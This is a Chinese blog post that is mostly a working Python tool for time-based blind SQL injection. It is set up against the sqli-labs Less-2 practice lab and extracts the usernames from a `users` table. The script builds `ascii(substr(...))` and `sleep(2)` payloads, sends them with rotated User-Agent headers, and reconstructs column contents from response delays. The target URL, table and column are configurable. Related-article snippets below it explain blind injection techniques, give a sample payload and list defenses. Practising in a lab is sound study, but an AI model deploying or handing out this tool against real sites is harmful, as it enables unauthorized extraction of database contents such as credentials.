SQL注入代码实践(盲注-获取字段中内容【数字型】)

SQL注入盲注结果获取与字符拼接
最新推荐文章于 2024-05-30 19:45:52 发布
原创 最新推荐文章于 2024-05-30 19:45:52 发布 · 303 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #pycharm #开发语言

该代码实现了一个SQL注入盲注工具,通过ASCII码判断目标数据库中的信息。它首先确定字段长度,然后逐位判断字符,利用延时注入技术验证ASCII值,最终拼接出字段内容。 
# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 22:10
@Auth : zhangxiang
@File :BlindInject_NumResult.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)

"""
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
from GetResultLength_Num import GetResultLength_Num

class BlindInject_NumResult:
    def __init__(self):
        pass
    def StartInject_NumResult(self,url,code,resultList,TableName,numResult,ColumnName):
        flag=0
        #%20and%20if(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,1)=%27e%27,sleep(5),1)
        for num in range(0, numResult+1):

            url = url
            judgeStr = "%20and%20if(ascii(substr((select%20group_concat(ColumnName)%20from%20TableName" \
                       "),changeNum,1))=%27replaceStr%27,sleep(2),1)"
            submitStr = "&submit=0x5375626D6974%23"
            patternTableName = r"TableName"
            replaceTableName = TableName
            changeName1 = re.sub(patternTableName, replaceTableName, judgeStr)
            patternColumnName = r"ColumnName"
            replaceColumnName = ColumnName
            changeName2 = re.sub(patternColumnName, replaceColumnName, changeName1)
            pattern1 = r"changeNum"
            replace1 = str(num)
            FisWord = re.sub(pattern1, replace1, changeName2)

            for x in range(44,123):#用ascii码判断,排除大小写错误
                asciiNum = str(x)
                word = FisWord + submitStr
                # 正则chr(asciiNum)
                pattern2 = r"replaceStr"
                replace2 = asciiNum
                SeWord = re.sub(pattern2, replace2, word)
                full_url = url + SeWord
                # print(full_url)
                # 2.发请求保存到本地
                headers = {'User-Agent':random.choice(ua_list)}
                startTime = time.time()
                req = request.Request(url=full_url, headers=headers)
                res = request.urlopen(req)

                endTime = time.time()
                allTime = endTime - startTime
                # print(allTime)
                # print(flag)

                if (resultList[flag] == "None"):
                    print("注入结束")
                    return resultList

                if (allTime > 2):
                    print("*" * 200)
                    asciiRe = chr(x)
                    resultList.append(asciiRe)
                    print("得到盲注结果:" + str(resultList))
                    print("注入的payload:" + full_url)
                    print("使用的时间:" + str(allTime))
                    print("*" * 200)
                    flag = flag+1
                else:
                    pass

        return resultList
    def getStr(self,resultList):  # 将列表值转为字符串
                    resultList.pop(0)
                    list2 = [str(i) for i in resultList]
                    strList = ''.join(list2)
                    return strList




if __name__ == '__main__':
    BlindInject_NumResult = BlindInject_NumResult()
    GetResultLength_Num = GetResultLength_Num()
    TableName = "users"
    ColumnName="username"
    resultList = ["开始"]
    path = './code2.txt'
    url = "http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-2/?id=1"
    f = open(path, 'r', encoding='utf-8')
    code = f.read()
    print(resultList[0])
    print("注入中,请稍等:")
    numResult = GetResultLength_Num.StartGetResultLength_Num(url,TableName,ColumnName)
    print("该字段中的内容的长度为:" + str(numResult))
    resultList = BlindInject_NumResult.StartInject_NumResult(url,code,resultList,TableName,numResult,ColumnName)
    strList = BlindInject_NumResult.getStr(resultList)
    print("该字段中的内容有:"+strList)

《网络安全自学教程》- SQL注入之布尔原理+步骤+实战操作
wangyuxiang946的博客
05-13 1万+
这篇文章为大家解析布尔实现原理,结合实战案例讲解布尔使用步骤
SQL注入详解
热门推荐
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
8.sql injection之获取当前列的所有字段值(数据内容-------小白笔记
qwsn
11-03 2049
1.爆库过程是: 爆库名 爆库里的表 爆表里的列字段 爆列里的数据 2.意: ①.表里的字段是:列字段 ②.列里的内容是:数据 3.注入: ①源码:select first_name,last_name from users where id ='$id' ②构造语句(也就是给$id赋值):1’ union select user,password from users# ③真正执行的语句...
sql中实现取得某字段数字
weixin_30954265的博客
02-23 430
ALTER function [dbo].[GetNum](@a nvarchar(4000)) returns nvarchar(4000) as begin while patindex('%[^0-9]%',@a)>0 begin set @a=stuff(@a,patindex('%[^0-9]%',@a),1,...
sql注入之找库、找表、找字段
m0_74608722的博客
05-30 588
sql注入的目标之一为找到想要注入的库、想要注入的表、想要注入字段SQL注入中含有字符逃逸。
SQL注入代码实践-获取字段名长度【字符型】)
DMHY123的博客
08-20 303
代码SQL注入代码实践-获取字段名长度【字符型】)
SQL注入(查询注入
m0_61974571的博客
10-12 1893
如果使用config的认证方式,则直接进入后台,如果为http,可以进行爆破,最好不要开启phpmyadmin,或者在需要的时候再开启远程登陆,修改/opt/lampp/etc/extra/http-xampp.conf文件禁用远程访问。使用方法:https://blog.youkuaiyun.com/kikajack/article/details/80065753。上述语法主要针对mysql数据库,如果针对其他数据库,需要使用其他数据库的语法。3、Web页面中有两个SQL查询语句,查询的列数不相同。
SQL-实战布尔
dkxkl1314的博客
03-09 3481
环境:win10靶场:sqli-labs-master就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为。而布尔就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL注入-时间
dkxkl1314的博客
03-11 1054
就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为。时间忙住特性在页面中,不管用户输入什么,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。如下图不管我们输入什么,页面显示结果都是一样的1、判断是否存在注入2、获取数据库长度3、逐字猜解数据库名4、猜解表名数量5、猜解某个表名长度6、逐字猜解表名。
SQL注入 布尔的--手工+脚本一起更方便
mdp1234的博客
08-26 1293
MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。 第一步:找注入点(数字型)http://219.153.49.228/new_list.php?id=1 加 ’ 程序报错 加and 1=1 返回正常页面 加and 1=2 返回错误页面 则表示存在注入漏洞 ...
sql注入
qq_49714982的博客
04-06 4493
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入基础知识
hirak0的博客
11-11 1353
SQL注入概念 数据库基本概念 相关术语 数据 数据是指对客观事件进行记录并可以鉴别的符号,是对客观事物的性质、状态以及相互关系等进行记载的物理符号或这些物理符号的组合。它是可识别的、抽象的符号。 具体见百度百科 数据库 数据库是“按照数据结构来组织、存储和管理数据的仓库”。是一个长期存储在计算机内的、有组织的、可共享的、统一管理的大量数据的集合。 常见的数据库有:Access、MSSQL、Oracle、 SQLITE、 MySQL等 具体见百度百科 数据库管理系统 数据库管理系统(Database
利用 SQL 注入提取数据方法总结
Flag少侠的博客
04-13 2652
SQL 注入攻击中,UNION 运算符的潜在价值非常明显:如果应用程序返回了第一个(原始)查询得到的所有数据,那么通过在第一个查询后面注入一个 UNION 运算符,并添加另外一个任意查询,便可以读取到数据库用户访问过的任何一张表。
Sql注入截取字符串常用函数
weixin_34380296的博客
05-18 354
sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也成为,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。Ps;此处用mysql进行说明,其他类型数据库请自行检测。 三大法宝:mid(),substr(),left() mid()函数 此函数为截取字符串一部分。MID(co...
SQL Server 提取字符串中的数字
Pei_hua100的专栏
06-27 1万+
如何提取字符串中的数字
sql 获取字符串中的所有数字
x1043556915的博客
09-29 1223
代码sql 获取字符串中的所有数字
SQL注入详解(万字文章详解)
追光者的博客
03-12 9015
本文章仅为学习交流使用,请勿做其它用途使用,请勿触碰法律红线。
sql函数实现从字段字符串中获取数字
u014639984的专栏
09-06 1517
sql函数实现从字段字符串中获取数字BEGIN DECLARE v_length INT DEFAULT 0; DECLARE v_Tmp varchar(50) default ”; DECLARE v_result varchar(50) default ”; DECLARE v_str1 varchar(50) default ”; DECLARE v_str2 varchar(50
数字型sql注入怎么进行攻击获取数据库名
最新发布
07-13
数字型 SQL 注入是一种特定类型的 SQL 注入攻击,其特点是攻击者输入的是数字而非字符串。这种注入方式通常发生在应用程序未对用户输入进行充分验证或过滤的情况下。例如,在一个需要接收数字参数的 URL 或表单中,如果直接将用户输入拼接到 SQL 查询语句中而没有进行任何处理,则可能遭受数字型 SQL 注入攻击。 ### 数字型 SQL 注入的基本原理 在数字型 SQL 注入中,攻击者利用的是 SQL 语句中的条件逻辑来推断出数据库的信息。由于数字可以直接用于比较和运算,因此这类注入往往更容易实现(Blind SQL Injection),即即使没有明确的错误信息反馈给攻击者,也可以通过观察应用的行为变化来判断注入是否成功。 #### 获取数据库名称的方法 要通过数字型注入获取数据库名称,通常会采用基于布尔的技术。这种方法依赖于向 SQL 查询中添加额外的布尔表达式,并根据页面响应的变化来判断这些表达式的真假值。具体步骤如下: 1. **确定注入点**:首先找到一个可以接受数字输入并将其直接嵌入到 SQL 查询中的位置。 2. **测试注入可能性**:尝试提交一些简单的布尔表达式,如 `1=1` 和 `1=2`,查看应用返回的结果是否有差异。 3. **构造复杂的布尔查询**:一旦确认存在注入漏洞,就可以开始构建更复杂的 SQL 语句来逐步探测数据库结构。例如,可以通过如下查询来检查当前数据库名的第一个字符是否为某个特定字母: ```sql SELECT * FROM users WHERE id = 1 AND ASCII(SUBSTRING((SELECT DB_NAME()), 1, 1)) > 70; ``` 这里使用了 `DB_NAME()` 函数来获取当前数据库的名字,`SUBSTRING` 来提取名字中的单个字符,`ASCII` 来转换成 ASCII 码值,并与 70(对应大写字母 'F')做比较[^4]。 4. **迭代猜测每个字符**:重复上述过程,调整比较值以缩小范围,直到能够准确地确定出整个数据库名称为止。 ### 防御措施 为了防止数字型 SQL 注入攻击,开发人员应该采取多种安全策略,包括但不限于: - 使用参数化查询或者预编译语句,确保所有用户输入都被视为数据而不是可执行代码- 对所有的用户输入进行严格的校验,特别是对于预期为数字字段,应强制类型转换。 - 最小权限原则,确保数据库账户只拥有完成任务所需的最小权限。 - 实施 Web 应用防火墙 (WAF),它可以识别并拦截常见的 SQL 注入模式。 - 定期更新和打补丁,保持数据库管理系统和其他相关软件的安全性。 通过以上方法和技术,攻击者可以在存在漏洞的应用程序上实施数字型 SQL 注入获取敏感信息,比如数据库名称。然而,只要遵循最佳实践并采用适当的安全机制,就能够有效地抵御此类攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值